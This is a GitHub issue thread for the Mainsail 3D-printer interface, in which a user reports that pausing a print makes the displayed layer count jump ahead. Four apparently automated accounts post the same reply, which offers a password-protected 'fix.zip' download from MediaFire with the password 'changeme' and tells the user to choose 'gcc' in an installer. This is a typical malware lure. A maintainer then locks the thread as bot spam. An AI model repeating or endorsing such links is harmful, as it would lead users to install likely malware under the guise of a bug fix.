mainsail-crew/mainsail #1983: Mainsail changes from current layer and adds 10 layers to layer count when pause button is pressed

goliathdj, 2024-08-26:
### Mainsail Version:

mainsail v2.12.0

### Browser:

Other (Please tell us below)

### Device:

Laptop

### Operating System:

Windows

### What happened?

im currently running Klipper on raspberry PI 4, paired with the ender S1 pro. 
the issue that i have started experiencing is that when i press the pause button the layer count shifts by an increment of 10 to 15 layers. example. when pause is pressed it will change from "Layer 10 of 100" to "Layer 21 of 100".
this causes the print to now continue on air.  i even did a reinstall of the image and the same thing still happens.  is there something that i am missing ? 

### What did you expect to happen instead?

when pressing the pause button i would expect the print to pause where it is and continue from where it left off

### How to reproduce this bug?

pause a print halfway and you will notice the immediate change in layer count

### Additional information:

if this can be tested on the ender s1 pro in order to isolate and identify what the issue could be

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

closed 2024-08-26 by github-actions[bot]

HaxBaba123, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

meteyou, 2024-08-26:
i locked this post, because of bot spam... pls contact us on discord or github discussions to fix your issue on your setup